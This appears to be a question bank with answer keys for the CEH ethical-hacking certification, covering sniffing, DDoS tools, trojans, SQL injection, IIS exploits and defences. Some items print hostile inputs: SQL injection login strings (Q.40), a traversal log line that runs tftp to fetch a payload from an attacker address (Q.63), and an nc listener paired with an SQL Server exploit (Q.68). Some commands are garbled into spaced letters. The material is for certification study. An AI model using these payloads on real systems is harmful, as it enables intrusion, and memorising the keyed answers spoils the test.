C#CEH Q.1 If your concern is hackers coming across the firewall and using SMB session hijacking, ^  you can block that by not allowing UDP ports __________ as well as TCP ports _________ from coming through the firewall. ^  (Select the Best Answer)^A.	167, 345 and 123 and 137^B.	80, 21 and 23, 110^C.	137, 138 and 139, 445^D.	1277, 1270 and 80, 21
D#CEH Q.2 Microsoft has maintained backward compatibility with its older dialects. This backward compatibility means that when a SMB session is initiated, a more primitive plain text level of authentication can often be negotiated that provides for maximum exposure of the password data. ^  Because SMB was developed to facilitate file and print sharing on local networks, a Windows client will automatically attempt to log onto an SMB server. ^  In the process, the host and client will exchange password hashes. ^  These pairs of password hashes, the challenge from the host plus the response from the client, can be sniffed and saved for later cracking by using which of the following hacking tool? (Select the Best Answer)^A.	SMBRelay^B.	ObiWan^C.	Hunt^D.	L0phtcrack^E.	NBTCracker
C#CEH Q.3 How do you prevent SMB Hijacking in Windows operating systems? (Select the Best Answer)^A.	Install WINS Server and configure secure authentication.^B.	Disable NetBIOS over TCP/IP in Windows NT and 2000.^C.	The only effective way to block SMB hijacking is to use SMB signing.^D.	Configure 128-bit SMB credentials key-pair in TCP/IP properties.
B#CEH Q.4 This tool is a free network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. ^  You can interactively browse the capture data, viewing summary and detail information for each packet. ^  This tool has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. (Select the Best Answer)^A.	Port Scan plus^B.	Ethereal^C.	Sam Spade^D.	Lp0Crack
D#CEH Q.5 What is a packet sniffer? (Select the Best Answer)^A.	A packet sniffer is a keyboard logger that plugs into computer networks and captures passwords.^B.	A packet sniffer is a packet blocker firewall that plugs into computer networks and generates packets.^C.	A packet sniffer is a Intrusion Detection System that monitors real time hacking events.^D.	A packet sniffer is a wire-tap devices that plugs into computer networks and eavesdrops on the network traffic.
ALL#CEH Q.6 What protocols are vulnerable to sniffing? (Select all that apply)^A.	Telnet and rlogin^B.	HTTP^C.	SNMP^D.	NNTP^E.	POP^F.	FTP^G.	IMAP
A#CEH Q.8 If you want to get a list of all the ip addresses as well as aliases assigned within a domain, you can grab that information if the DNS server allows zone transfers. ^  The zone transfer is the method a secondary DNS server uses to update its information from the primary DNS server. DNS servers within a domain are organized using a master-slave method where the slaves get updated DNS information from the master DNS. ^  Which nslookup command that dump all available records, assuming zone transfers are enabled? (Select the Best Answer)^A.	>set type=any > ls -d eccouncil.org >ns.eccouncil.org >exit^B.	< list=any < lc -x eccouncil.org< dns.eccouncil.org< exit^C.	< set type=any < dir -c eccouncil.org< dns.eccouncil.org< exit^D.	< set type=any < list report eccouncil.org< dns.eccouncil.org< exit^E.	< set type=any < dns -ls eccouncil.org< dns.eccouncil.org< exit
B#CEH Q.9 Let's imagine three companies (A, B and C), all competing in a challenging global environment. Company A and B are working together in developing a product that will generate a major competitive advantage for them. ^  Company A has a secure DNS server while company B has a DNS server vulnerable to spoofing. With a spoofing attack on the DNS server of company B, company C gains access to outgoing e-mails from company B. ^  How do you prevent DNS spoofing? (Select the Best Answer)^A.	Disable DNS Mail Relay.^B.	Disable DNS Zone Transfer.^C.	Install DNS logger and track vulnerable packets.^D.	Install DNS Anti-spoofer
A#CEH Q.10 Douglas Brown discovered a new worm that targets Microsoft SQL Server installations where the SQL Administrator password is blank (note that this is the default configuration for SQL Server 2000 and earlier). ^  The worm logs in using the Administrator account, then calls a command shell to FTP and install a Trojan. The Trojan communicates with the attacker via IRC, where the attacker is able to utilize the infected systems to launch Distributed Denial of Service (DDoS) attacks. ^  You would like to port scan all the SQL Servers that are vulnerable to this attack in your organization. Which port number you will scan for? (Select the Best Answer)^A.	1433^B.	1432^C.	1434^D.	1435
B#CEH Q.11 This hacking tool runs as a Windows OS stack and hides itself from netstat command. Any directory or file that starts with '_root_' will be hidden. Any process that starts with '_root_' will be hidden. (Select the Best Answer)^A.	WINOS Trojan^B.	NT Rootkit^C.	NubUs^D.	Back Orrifice
B#CEH Q.12 This Linux program is a daemon intended to catch someone installing a rootkit or running a packet sniffer. ^  It is designed to run continually with a small footprint under an innocuous name. ^  When triggered, it sends email, appends to a logfile, and disables networking or halts the system. It is designed to install with the minimum of disruption to a normal multiuser system, and should not require rebuilding with each kernel change or system upgrade. (Select the Best Answer)^A.	cheops^B.	chkrootkit^C.	desps^D.	qswatcher
D#CEH Q.13 What does the tool MP3Stego do? (Select the Best Answer)^A.	MP3Stego adds watermark to music data in MP3 files during the compression process.^B.	MP3Stego encrypts music in MP3 files during the compression process.^C.	MP3Stego adds images in MP3 files during the compression process.^D.	MP3Stego hides information in MP3 files during the compression process.
B#CEH Q.14 This hacking tool when placed over a web page reveals password displayed as "*****". (Select the Best Answer)^A.	NAT^B.	SnadBoy^C.	Password Revealer^D.	MugBoy
A#CEH Q.15 How long will it take to crack a password using straight dictionary attack (3 million words) on a single 1.5 GHz Intel Pentium machine? (Select the Best Answer)^A.	2.5 mins^B.	13.6 days^C.	4.2 hours^D.	4.6 days
C#CEH Q.16 This tool is a remote scanner for the most common Distributed Denial of Service programs. These were the programs responsible for the recent rash of attacks on high profile web sites such as Yahoo, Amazon, eBay. ^  This tool will detect Trinoo, Stacheldraht and Tribe Flood Network programs running with their default settings. (Select the Best Answer)^A.	DDoScanner^B.	DoSMinger^C.	DDoSPing^D.	DDoSKiller
B#CEH Q.17 This tool from GFI is a freeware security scanner to audit your network security. It scans entire networks and provides NETBIOS information for each computer such as hostname, shares, logged on user name. ^  It does OS detection, tests password strength, detects registry issues. Reports are outputted in HTML. ^  This tool checks the network for all potential methods that a hacker might use to attack a network. ^  By analyzing the operating system and the applications running on your network, it identifies possible security holes in the network. In other words, it plays the devil's advocate and alerts weaknesses before a hacker can find them, enabling the administrator to deal with these issues before a hacker can exploit them.(Select the Best Answer)^A.	SAN Secure Scanner^B.	LANGuard Network Scanner^C.	GFI Guard^D.	Sentinel Scanner
B#CEH Q.18 The tool MingSweeper. What is it used for? (Select the Best Answer)^A.	MingSweeper is a session hijacking tool.^B.	MingSweeper is a network reconnaissance tool.^C.	MingSweeper is an ARP poisoning tool.^D.	MingSweeper is a port scanner.
A#CEH Q.19 What does the hacking tool NetCat do? (Select the Best Answer)^A.	NetCat is called the TCP/IP swiss army knife It is a simple Unix utility which reads and writes data across network connections using TCP or UDP protocol.^B.	NetCat is a powerful tool for network monitoring and data acquisition This program allows you to dump the traffic on a network. It can be used to print out the headers of packets on a network interface that matches a given expression.^C.	NetCat is a flexible packet sniffer/logger that detects attacks. NetCat is a libpcap-based packet sniffer/logger which can be used as a lightweight network intrusion detection system.^D.	NetCat is a security assesment tool based on SATAN (Security Administrator's Integrated Network Tool).
C#CEH Q.20 What is Whisker? (Select the Best Answer)^A.	Whisker is a Trojan virus.^B.	Whisker is an application scanner.^C.	Whisker is a CGI vulnerability scanner^D.	Whisker is a SNMP dumping tool.
D#CEH Q.21 This tool is a file and directory integrity checker. It aids system administrators and users in monitoring a designated set of files for any changes. Used with system files on a regular (e.g., daily) basis, ^  it can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner. (Select the Best Answer)^A.	Hping2^B.	DSniff^C.	Cybercop Scanner^D.	Tripwire
C#CEH Q.22 This is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like ping does with ICMP replies. ^  It handles fragmentation and arbitrary packet body and size, and can be used to transfer files under supported protocols. ^  Using this tool, you can: test firewall rules, perform [spoofed] port scanning, test net performance using different protocols, packet size, TOS (type of service), and fragmentation, do path MTU discovery, tranfer files (even between really Fascist firewall rules), perform traceroute-like actions under different protocols, fingerprint remote OSs, audit a TCP/IP stack, etc. (Select the Best Answer)^A.	Nemesis^B.	Lids^C.	Hping2^D.	Cybercop Scanner
B#CEH Q.23 WinTrinoo is an example of: (Select the Best Answer)^A.	Firewall^B.	DDoS Attack tool^C.	Virus Scanner^D.	Trojan Program
B#CEH Q.24 Which of the following Nmap command launches a stealth SYN scan against each machine that is up out of the 255 machines on class C where target.example.com resides and tries to determine what operating system is running on each host that is up and running? (Select the Best Answer)^A.	nmap -v target.example.com^B.	nmap -sS -O target.example.com/24^C.	nmap -sX -p 22,53,110,143,4564 198.116.*.1-127^D.	nmap -XS -O target.example.com
A#CEH Q.26 Snort is a Linux based Intrusion Detection System. Which command enables Snort into network intrusion detection (NIDS) mode assuming snort.conf is the name of your rules file and the IP address is: 192.168.1.0 with Subnet Mask:255.255.255.0? (Select the Best Answer)^A.	./snort -c snort.conf 192.168.1.0/24^B.	./snort 192.168.1.0/24 -x snort.conf^C.	./snort -dev -l ./log -a 192.168.1.0/8 -c snort.conf^D.	./snort -dev -l ./log -h 192.168.1.0/24 -c snort.conf
C#CEH Q.27 Many web based authentication models revolve around solely trusting cookies for verification of a user's session. If a malicious person can obtain a user's cookies for a service, then he can use those cookies to access the victim's account. ^  Pages that can use a server's cookies are limited to that particular server, or higher-level domain servers (like hotmail.passport.com for '.passport.com' cookies). ^  In order for a malicious person to obtain a victim's cookies for a site, he must manufacture a fake javascript that must execute within a page from that same domain. ^  This is done by manipulating the error messages that are returned, either from 404 requests or form elements that are echoed back to the screen unescaped. For example, by sending a web-mail user an email with a link to the very same server, the link looks harmless, and it can trick the user into clicking on the link, thus running the embedded javascript and sending his cookies to the malicious person. How do you prevent thiype of cookie hijacking? (Select the Best Answer)^A.	Escaping all form data that is echoed to the screen and not echoing 404 file requests eliminates this problem.^B.	Setting up some secondary authentication requirement other than cookie information would at least make this session-stealing problem a lesser threat.^C.	Enabling SSL on all the authentication pages will solve the problem.^D.	Implement 128-bit cookie security on all your sessions with the client browser.
A#CEH Q.28 Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow. A vulnerability in the ASP (Active Server Pages) ISAPI filter, loaded by default on all NT4 and Windows 2000 server systems (running IIS), can be exploited to remotely execute code of an attackers choice. ^  The fault lies within the decoding and interpretation of form data received by malicious clients. ^  By chunk encoding form data we can force IIS to overwrite 4 bytes of arbitrary memory with data we supply. This is a very serious vulnerability and Microsoft suggests that administrators install the supplied patch as soon as possible. ^  What is the patch number, which fixes this bug in IIS? (Select the Best Answer)^A.	Microsoft Security Bulletin MS02-018^B.	Microsoft Security Bulletin MS02-456^C.	Microsoft Security Bulletin MS02-056^D.	Microsoft Security Bulletin MS02-234
E#CEH Q.29 tini is a simple and very small (3kb) trojan backdoor for Windows, coded in assembler. It listens at TCP port and connects via remote Command Prompt. What port number does it listen on by default? (Select the Best Answer)^A.	3333^B.	4444^C.	5555^D.	6666^E.	7777
C#CEH Q.30 Which of the following program is capable of detecting and removing more than 1000 Trojan Horses from your system? (Select the Best Answer)^A.	NuBuS^B.	SubSeven^C.	Tauscan^D.	BO^E.	Tini^F.	TrojanKiller
D#CEH Q.31 What is Zombie Zapper? (Select the Best Answer)^A.	Zombie Zapper is a DDoS tool that installs on a victim's machine as "zombie".^B.	Zombie Zapper is a firewall, which works on Linux and Solaris OS.^C.	Zombie Zapper is a trojan that listens on port 2345.^D.	Zombie Zapper is a free, open source tool that can tell a zombie system flooding packets to stop flooding.
B,C#CEH Q.32 Which of the following are examples of Distributed Denial of Service (DDoS) attack tools? (Select all that apply)^A.	WinTrinoo^B.	TFN2K^C.	Stacheldraht^D.	Knight^E.	Kayton^F.	GTBot
B#CEH Q.33 Netcat is a simple network utility which reads and writes data across network connections, using TCP or UDP protocol. Which of the following command scans for open ports between [1 - 140]? (Select the Best Answer)^A.	nc -xx -q -w2 my-attacker-IP-address [1-140]^B.	nc -vv -z -w2 my-attacker-IP-address 1-140^C.	nc my-attacker-IP-address (1,140)^D.	nc 140 my-attacker-IP-address -vv
B#CEH Q.34 This network tool is a comprehensive packet analyzer for IEEE 802.11 wireless LANs, supporting all higher level network protocols such as TCP/IP, AppleTalk, NetBEUI and IPX. ^  This tool isolates security problems, fully decodes 802.11a and 802.11b WLAN protocols, and analyzes wireless network performance with accurate identification of signal strength, channel and data rates. (Select the Best Answer)^A.	AeroSeek^B.	AiroPeek^C.	AirMan^D.	AirCell^E.	AirWire
D#CEH Q.35 Which of the following is a wireless LAN (WLAN) tool which recovers encryption keys. (Select the Best Answer)^A.	AirPeek^B.	AirMan^C.	Airport^D.	AirSnort
D#CEH Q.36 "Anonymous web surfing" is a proxy server, which downloads the webpage you requested and then displays the web page to you through an encrypted URL. ^  Since your computer doesn't make a connection to the server, it brings it to you totally anonymous, and they have no idea you were there, and information about you and your computer isn't gathered by that website. ^  All you do is type in the web site you want to visit and you will be taken there promptly and securely. Which of the following web site provides free anonymous web surfing services? (Select the Best Answer)^A.	http://www.anoyume.com^B.	http://www.privacybusters.com^C.	http://www.badboys.com^D.	http://www.silenter.com
B#CEH Q.37 Which hacking tool exploits Microsoft Windows 2000 IIS 5.0 IPP ISAPI 'Host:' Buffer Overflow Vulnerability?(Select the Best Answer)^A.	IIS Lockdown^B.	Jill-32^C.	IPP Scanner^D.	IPP Exploit^E.	URLScan
C#CEH Q.38 Which of the following is a ramdisk-based Linux distribution that boots from a single floppy and loads it packages from an HTTP/FTP server? (Select the Best Answer)^A.	Red Hat Linux^B.	Turbo Linux^C.	Trinux^D.	Flopix^E.	Raminux
A#CEH Q.39 SQL injection is usually caused by developers who use "string-building" techniques in order to execute SQL code. For example, in a search page, the developer may use the following code to execute a query:	^  Set myRecordset = myConnection.execute("SELECT * FROM myTable WHERE someText ='" & request.form("inputdata") & "'") ^  Which of the following prevents SQL injection on a web page? (Select the Best Answer)^A.	For string data, replace single quotes with two single quotes using the replace function or equivalent : goodString = replace(inputString,','')^B.	For string data, replace double quotes with two single quotes using the replace function or equivalent: goodString = replace(inputString,'','')^C.	For string data, replace single quotes with asterix using the replace function or equivalent: goodString = replace(inputString,',*)^D.	For string data, replace single quotes with two underscore characters using the replace function or equivalent: goodString = replace(inputString,',__)
D#CEH Q.40 How do you test SQL injection vulnerability on a Web page? (Select the Best Answer)^A.	Input "asterix character" something like:^  hi* or 1=1-- ^  Into login, or password, or in the URL. Example:^  Login: hi* or 1=1--^  Pass: hi* or 1=1--^  http://duck/index.asp?id=hi* or 1=1- ^B.	Input "underscore character" something like:^  hi__ or 1=1--^  Into login, or password, or in the URL. Example:^  Login: hi__ or 1=1--^  Pass: hi__ or 1=1--^  http://duck/index.asp?id=hi__ or 1=1--^C.	Input "double quote" something like:^  hi'' or 1=1--^  Into login, or password, or in the URL. Example:^  Login: hi'' or 1=1--^  Pass: hi'' or 1=1--^  http://duck/index.asp?id=hi'' or 1=1--^D.	Input "single quote" something like:^  hi' or 1=1--^  Into login, or password, or in the URL. Example:^  Login: hi' or 1=1--^  Pass: hi' or 1=1--^  http://duck/index.asp?id=hi' or 1=1--
A#CEH Q.41 Which of the following is a dictionary attack tool for Microsoft SQL Server, which lets you test if the login accounts are strong enough to resist an attack? (Select the Best Answer)^A.	SQLdict^B.	SQLAttack^C.	SQLWalker^D.	C-Q-L-HACK
B#CEH Q.42 Which of the following is a hacking tool that has the ability to hijack TCP sessions? For example, you can capture the contents of a Telnet session and spy on what a person is doing, or hijack the session and start typing in your own commands. (Select the Best Answer)^A.	JungleBungle^B.	Juggernaut^C.	SesHijack^D.	TCP Kidnapper
A#CEH Q.43 Smurf attacks are the easiest distributed DOS attack to commit. ^  In its simplest form, the attacker begins by using a commonly available program to scan the Internet to locate routers that that allow entry to broadcast pings. ^  When he or she locates this kind of router, then next step is to forge ping packets with the origination address of the intended victim. This is done using packet manipulation tools. ^  This type of attack can also use other Internet Control Message Protocol (ICMP) techniques. ^  To avoid arrest, the attacker will typically use a hacked computer to send out these forged ping packets. ^  These packets are then sent to the network behind the vulnerable router. ^  Each computer on this network echoes each attacking ping out to the victim designated in the ping's forged header. ^  So if there are two hundred computers on this intermediary network, for every single ping of the attacking computer, they will send 200 pings out to the victim. ^ How do you defend against these typeof Smurf attack?(Select the BeSt Answer)^A.	deny broadcast pings at the intermediary network's border router.^B.	deny ICMP at the intermediary network's border router.^C.	deny smurf 34.6 type frames at the firewall.^D.	enable broadcast pings at the intermediary network's border router.
D#CEH Q.44 Which tool detects the presence of Trinoo, TFN, or Stacheldraht clients on your machine? (Select the Best Answer)^A.	DDoS Detector^B.	TrinooBuster^C.	TFNKiller^D.	RID
C#CEH Q.45 Trinoo is a dangerous distributed tool used to launch coordinated UDP flood denial of service attacks from many sources. A trin00 network consists of a small number of servers, or masters, and a large number of clients, or daemons. ^  The denial of service attack utilizing a trin00 network is carried out by an intruder connecting to a trin00 master and instructing that master to launch a denial of service attack against one or more IP addresses. The trin00 master then communicates with the daemons giving instructions to attack one or more IP addresses for a specified period of time. What default port does the master sends UDP broadcast packets to the daemon? (Select the Best Answer)^A.	27445^B.	27447^C.	27444^D.	27449
C#CEH Q.46 Buffer overflow attacks exploit a lack of bounds checking on the size of input being stored in a buffer array. ^  By writing data past the end of an allocated array, the attacker can make arbitrary changes to program state stored adjacent to the array. How do you protect your system from buffer overflow exploits? (Select the Best Answer)^A.	Install a firewall system which protects from buffer overflow exploits.^B.	Install an IDS system which protects from buffer overflow exploits.^C.	Proper OS Patch maintenance is the best way to protect your systems from the buffer overflow attack.^D.	Proper virus pattern maintenance is the best way to protect your systems from the buffer overflow attack.
D#CEH Q.47 First appearing on September 18, 2001, Nimda is a computer virus that caused traffic slowdowns as it rippled across the Internet, spreading through four different methods, infecting computers containing Microsoft's Web server, Internet Information Server (IIS), and computer users who opened an e-mail attachment. ^  Like a number of predecessor viruses, Nimda's payload appears to be the traffic slowdown itself - that is, it does not appear to destroy files or cause harm other than the considerable time that may be lost to the slowing or loss of traffic known as denial-of-service and the restoring of infected systems. With its multi-pronged attack, Nimda appears to be the most troublesome virus of its type that has yet appeared. Nimda virus refers to a file, when run, continues to propagate the virus. What is the name of this file? (Select the Best Answer)^A.	cmd.exe^B.	patch.exe^C.	explorer.dll^D.	admin.dll
B#CEH Q.48 What buffer overflow vulnerability does Nimda virus exploit to gains access to IIS servers? (Select the Best Answer)^A.	Internet Printing Protocol (IPP)^B.	ISAPI DLL^C.	Windows 2000 KRNLOS.EXE^D.	IIS SMTP Services
A#CEH Q.50 This is a Novell Netware hacking tool which simulates a Novell file server. The serverwill be visible for about 1 to 2 minutes. ^  On some systems the server willbe visible for as long as the program is running. (Select the Best Answer)^A.	Novelffs^B.	Novell Faker^C.	Noveknell^D.	Novell Detector
C#CEH Q.51 Digging into the rubbish bin to find pieces of information is an example of what attack (Select the Best Answer)^A.	Spoofing^B.	Social Engineering^C.	Dumpster Diving^D.	Information gathering
B,C#CEH Q.52 In a man-in-the-middle (MiTM)attack of a SSL connection sniffing, which of the following are true?^          Session Key A                     Session Key B^  Server -------------- middle man --------------- Client^  (Select all that apply)^A.	Session Key A is sent by middle man and encrypted by client public key^B.	Session Key B is sent by client and encrypted by middle man public key^C.	Session Key A is sent by middle man and encrypted by server public key^D.	Session Key B is sent by client and encrypted by client public key^E.	Session Key A is sent by middle man and encrypted by client private key^F.	Session Key B is sent by client and encrypted by server private key
D#CEH Q.53 Which of the following network connection is or are encrypted and cannot be sniffed by an attacker on the network? (Select the Best Answer)^A.	Telnet^B.	POP3^C.	NFS^D.	SSH^E.	SMTP
B#CEH Q.54 In the Linux BIND NXT bug remote root exploit attack, the hacker inserts the shell code in which of the following connection? (Select the Best Answer)^A.	UDP on victim port 53^B.	TCP on victim port 53^C.	UDP on victim port above 1024^D.	TCP on victim port above 1024
D#CEH Q.55 An attacker on a Linux system may be able to recover a removed file from a disk using which of the following technique? (Select the Best Answer)^A.	if he knows the name of the removed file^B.	if he knows the date the file was removed^C.	if he knows the size of the file that was removed^D.	if he knows the inode value of the removed file
C#CEH Q.56 This is a firewall filter rules configured on a Linux system:^  # set the default to deny all incoming network traffic^  /sbin/ipchains -P input DENY^  # Allow incoming TCP traffic^  /sbin/ipchains -A input -i eth0 -p tcp ! -y -s any/0 -j ACCEPT^  An attacker sends a huge packet targeted towards the Linux system. Which of the following does the firewall will not block from an attack? (Select all that apply)^A.	TCP connection scan^B.	Half connect()^C.	FIN scan^D.	Xmas scan^E.	Null scan
A#CEH Q.57 Which of the following filter rules configured on a Linux system will block all outgoing ssh and telnet traffic to the hosts of the IP range 192.168.0.0 to 192.168.39.255? (Select the Best Answer)^A.	i p c h a i n s - A o u t p u t - p t c p - s a n y / 0 - d 1 9 2 . 1 6 8 . 0 . 0 / 1 9 2 2 : 2 3 - j D E N Y _ l                      ipchains -A output -p tcp -s any/0 -d 192.168.32.0/21 22:23 -j DENY -l^B.	i p t a b l e s - A i n p u t - r I C M P - s a n y / 0 - d 1 9 2 . 1 6 8 . 0 . 0 / 1 9 2 3 : 2 2 - j D E N Y _                              li p t a b l e s - A o u t p u t - p t c p - s a n y / 0 - d 1 9 2 . 1 6 8 . 3 2 . 0 / 2 1 2 3 : 2 2 - j D E N Y _ l^C.	i p c o m m a n d - A o u t p u t - p t c p - s p e r m i t / 1 - d 1 9 2 . 1 6 8 . 0 . 0 / 1 9 2 2 : 2 3 - j A L L O W _             li p c o m m a n d - A o u t p u t - p t c p - s p e r m i t / 1 - d 1 9 2 . 1 6 8 . 3 2 . 0 / 2 1 2 2 : 2 3 - j A L L O W _ l^D.	i p f i l t e r - A o u t p u t - p t c p - s a n y / 0 - d 1 9 2 . 1 6 8. 0 . 0 / 1 9 2 2 : 2 3 - j D E N Y _ l                     ipfilter -A output -p tcp -s any/0 -d 192.168.32.0/21 22:23 -j DENY -l
C#CEH Q.58 From the following spam mail header, identify the host IP that sent this spam?^  Note: This question includes an HTML table which may not be accurately rendered^  From jie02@netvigator.com Tue Nov 27 17:27:11 2001^  Received: from viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk (8.11.6/8.11.6) with ESMTP id fAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT)^  Received: from mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by viruswall.ie.cuhk.edu.hk (8.12.1/8.12.1) with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 +0800 (HKT)^  Message-Id: >200111270926.fAR9QXwZ018431@viruswall.ie.cuhk.edu.hk^  From: "china hotel web"^  To: "Shlam"^  Subject: SHANGHAI (HILTON HOTEL) PACKAGE^  Date: Tue, 27 Nov 2001 17:25:58 +0800 MIME-Version: 1.0^  X-Priority: 3 X-MSMail-^  Priority: Normal^  Reply-To: "china hotel web"^	(Select the Best Answer)^A.	137.189.96.52^B.	203.218.39.50^C.	203.218.39.20^D.	8.12.1.0
A#CEH Q.59 A httpd access_log file shows a WEB-IIS attack from a remote host^  04:47:14 137.68.238.15 GET /scripts/..%5c../winnt/system32/cmd.exe 404^  Which of the following will provide the organization (in full name) that owns the whole IP block of the remote host (i.e. 137.68.0.0 - 137.68.255.255)? (Select the Best Answer)^A.	#whois 137.68.238.15@whois.arin.net^B.	#arin 137.68.238.15^C.	# t u c o w s _ t 1 3 7 . 6 8 . 2 3 8 . 1 5^D.	#dlookup 137.68.238.15@name -l
D#CEH Q.60 Buffer overflow exploit can change the execution flow of a program because: (Select all that apply)^A.	it injects shell code in the stack^B.	it stuffs many 90 NOP code to the stack^C.	it stuffs too many data into local function variables^D.	it overwrites the return address of a call function in the stack
B,C,D#CEH Q.61 Which of the following techniques are used for insertion attack on IDS? (Select all that apply)^A.	Using IP Fragmentation^B.	Using Invalid sequence no.^C.	Using incorrect TCP checksum^D.	Using short TTL^E.	Using non-existent SYN packet flood
A#CEH Q.62 The following is tcpdump packets of an ARP poisoning Man-in-the-Middle (MITM) attack.^  0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61^  0:50:56:47:0:61 0:50:56:47:0:65 42: arp reply ntec9-28 is-at 0:50:56:47:0:61^  0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61^  0:50:56:47:0:61 0:50:56:47:0:65 42: arp reply ntec9-28 is-at 0:50:56:47:0:61^  0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61^  What is the MAC address of the middleman? (Select the Best Answer)^A.	0:50:56:47:0:61^B.	0:50:56:47:0:65^C.	0:50:56:47:0:46
C#CEH Q.63 John's department Web site has been hacked. He reviews the Web site logs and discovers the following log entries:^  34.5.67.4 is the IP address of the attacker:^  GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/ c+tftp%20-i%34.5.67.4%20GET%20Admin.dll%20c:\Admin.dll^  Which of the following worm is responsible for this attack? (Select the Best Answer)^A.	Mellisa^B.	SQL Slammer^C.	Nimda^D.	Code Red
C#CEH Q.64 Jack Hacker wants to break into Brown Co.'s computers and obtain their secret double fudge cookie recipe. ^  Jack calls Jane, an accountant at Brown Co., pretending to be an administrator from Brown Co. ^  Jack tells Jane that there has been a problem with some accounts and asks her to tell him her password ''just to double check our records.'' Jane believes that Jack is really an administrator, and tells him her password. Jack now has a user name and password, and can access Brown Co.'s computers, to find the cookie recipe.^  This is an example of what attack? (Select the Best Answer)^A.	Reverse Psychology^B.	Reverse Engineering^C.	Social Engineering^D.	Spoofing Identity^E.	Faking Identity
A#CEH Q.65 On October 7, 2001, NASA suffered massive attacks. Files were taken and employees' directories were invaded. ^  The intruders left methods to regain access to the system, called ''back doors,'' to allow them to reenter at any point in the future. ^  The attackers used a malicious program that disguises itself as a Word document and uses a flaw in the Word program for its attack. ^  Once the file is opened, it can steal log files and passwords. These are then sent back to the originator of the attack. ^  What worm was used for this attack? (Select the Best Answer)^A.	Mellisa^B.	Pretty Park^C.	Goga^D.	W32:Klez
B#CEH Q.66 Which of the following correctly describes the IDS evasion tool fragrouter? (Select the Best Answer)^A.	Some IDS can only keep track of one host/port connection at a time. Flood the target port with non-existent SYN packet first so that these IDS ignore the real connection.^B.	IP Fragmentation. By sending out fragment packets out of order, some IDS assume the fragment packets arrive in order. They just reassemble the data as soon as the marked final fragment arrives. Sending out fragment packets out of order may fool the IDS.^C.	Sending overlapping fragment packets. There may be a gap between the IDS and end-point server handling overlapping fragment. If the IDS does not handle overlapping fragments in a manner consistent with the systems it watches, it may reassemble a completely different packet than an end system in receipt of the same fragments.^D.	An end-system can accept a packet that an IDS rejects. An IDS that mistakenly rejects such a packet misses its contents entirely.
B#CEH Q.67 What does the hacking tool WinSSLMiM used for? (Select the Best Answer)^A.	Kills SSL TCP Sessions.^B.	Used in Man-in-the-Middle attacks against SSL Connections.^C.	Generates fake SSL Certificates.^D.	Monitors Windows SSL Sessions.
A,B,C#CEH Q.68  The Microsoft SQL Server contains several serious vulnerabilities that allow remote attackers to obtain sensitive information, alter database content, compromise SQL servers, and, in some configurations, compromise server hosts. ^  The SQL Server Resolution Service operates on UDP port 1434, provides a way for clients to query the appropriate network endpoints to use for a particular SQL Server instance. By sending a carefully crafted packet to the Resolution Service, an attacker could compromise and take over the system. ^  The hacking tool SQL2.EXE is used to launch this attack.^  C:\<nc -l -p 53^  C:\<SQL2.EXE db.target.com 202.202.202.202 53^  Which Microsoft SQL Server 2000 service packs are vulnerable to this exploit? (Select all that apply)^A.	SP0^B.	SP1^C.	SP2^D.	SP3
C#CEH Q.69 Which of the following is a backdoor Dynamic Link Library (DLL) Trojan that is used to attack and exploit IIS servers? If the attack is successful, then the attacker will have gained System level access to the server. ^  The Trojan DLL needs to be installed in the 'Scripts' directory of the IIS 5.0 machine in order for the exploit to be used. Browsing to the DLL (eg. http://IIS-server/enables the  Hacker to spawn commands remotely (using CM^D.EXE). (Select the Best Answer)^A.	IISExploit^B.	Jill-32.dll^C.	IISCrack.dll^D.	IPPExploit.dll
B#CEH Q.70 Which of the following Windows Hacking tool is used to hijack Telnet and FTP sessions? (Select the Best Answer)^A.	Hunt^B.	Juggernaut^C.	TTYWatcher^D.	T-Sight
C#CEH Q.71 Take a look at the following code:^  c:\< wtk -p 80 -i 192.168.0.1^  What does the hacking tool WTK do? (Select the Best Answer)^A.	It is a TCP connection killer for Windows 2000.^B.	It is a Windows Trojan Kit (wtk) program that connects to the daemon at 192.168.0.1 using port 80.^C.	It is a Windows Tunneling Kit (wtk) that establishes covert channels to 192.168.0.1 using port 80.^D.	This is a Linux command, which lists services and threads running on 192.168.0.1 at port 80.
c#CEH Q.74 What is the IP address of _rootkit_'s embedded TCP/IP stack? (Select the Best Answer)^A.	192.168.0.78^B.	172.8.0.1^C.	10.0.0.166^D.	204.187.7.99
C#CEH Q.75 You have successfully compromised MommaCookie's computer at MommaCookie.com domain. You have escalated your privileges to the level of an Administrator and planted a virus. You would like to cover your tracks by selectively erasing operating system log entries. Which tool will you use? (Select the Best Answer)^A.	Auditpol.exe^B.	Elslave.exe^C.	WinZapper^D.	Evidence Eliminator
D#CEH Q.76 Which of the following is a steganographic program that is used to conceal messages in ASCII text by appending whitespace to the end of lines in a text file? (Select the Best Answer)^A.	Camera/Shy^B.	ImageHide^C.	WhiteSpacer^D.	Snow
B#CEH Q.77 What is a Restorator? (Select the Best Answer)^A.	Restorator is a hacking tool which records keystrokes on a victim's computer.^B.	Restorator is a hacking tool which allows you to modify the user interface of any Win32 program by creating your own UCA's.^C.	Restorator is an advanced EXE wrapper for Windows 2K, which is used for SFX-archiving and secretly installing and running programs.^D.	It is a BackOrifice plug-in tool which extends BO2K functionality.
D#CEH Q.78 Which of the following is an ARP spoofing tool that is part of dsniff? (Select the Best Answer)^A.	Webspy^B.	URLSnarf^C.	Arpsniff^D.	Macof
B#CEH Q.79 Which of the following is a MAC address modifying utility which allows users to change MAC address for almost any Network Interface Cards (NIC) on the Windows 2000 and XP systems? (Select the Best Answer)^A.	Macof^B.	Smac^C.	Mac Changer^D.	Arpper
